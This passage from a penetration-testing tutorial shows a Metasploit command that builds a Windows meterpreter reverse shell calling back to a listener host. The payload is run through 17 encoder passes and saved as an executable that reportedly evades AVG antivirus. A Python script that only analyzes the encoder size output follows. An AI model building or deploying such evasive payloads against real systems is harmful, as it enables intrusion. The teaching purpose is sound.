
Chapter 7

It is recommended that you test your script using an evaluation version of a product to see if it bypasses the antivirus software prior to using it in a penetration test. Here’s an example of using multiple encoding passes:

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)

root@bt:/opt/framework3/msf3#

Here we use five counts of shikata_ga_nai, feeding the code in raw format into two counts of alpha_upper encoding, which is then fed to another five counts of shikata_ga_nai, followed by five counts of countdown encoding, before finally directing the output into the desired executable. We are using a total of 17 encoding loops in an attempt to circumvent the antivirus software. And, as you can see in Figure 7-3, we have successfully slipped our payload past the antivirus engine.

Figure 7-3: AVG has not detected the multi-encoded payload.
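To make the size figures in the listing above easier to read, here is a small analyzer, added as an example and not taken from the book or from the Metasploit project, that parses the msfencode progress lines (the listing's own output is embedded as its input), splits them into the four encoder passes, and reports how many bytes each iteration added and how much each pass grew its input. It makes visible that shikata_ga_nai and countdown add a fixed number of bytes per iteration while alpha_upper more than quadruples the size over its two passes, which is the size cost that an analyst examining such a sample should expect from 17 encoding loops.

```python
import re
# Progress lines copied from the msfencode chain shown above (used as sample input).
MSFENCODE_OUTPUT = """\
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
"""
LINE_RE = re.compile(r"\[\*\] (\S+) succeeded with size (\d+) \(iteration=(\d+)\)")
def parse_passes(text):
    # Each msfencode in the pipeline restarts its counter at 1, so iteration=1 opens a new pass.
    passes = []
    for m in LINE_RE.finditer(text):
        enc, size, it = m.group(1), int(m.group(2)), int(m.group(3))
        if it == 1:
            passes.append({"encoder": enc, "sizes": []})
        passes[-1]["sizes"].append(size)
    return passes

def total_iterations(passes):
    return sum(len(p["sizes"]) for p in passes)

def summarize(passes):
    # Per pass: bytes each iteration added, and growth relative to the size the pass received.
    rows, prev = [], None
    for p in passes:
        sizes = p["sizes"]
        chain = ([prev] if prev is not None else []) + sizes
        rows.append({
            "encoder": p["encoder"],
            "iterations": len(sizes),
            "output_size": sizes[-1],
            "bytes_added_per_iteration": [b - a for a, b in zip(chain, chain[1:])],
            "growth_factor": round(sizes[-1] / prev, 2) if prev else None,
        })
        prev = sizes[-1]
    return rows
```

The first pass has no growth factor because the raw payload size before any encoding is not shown in the listing.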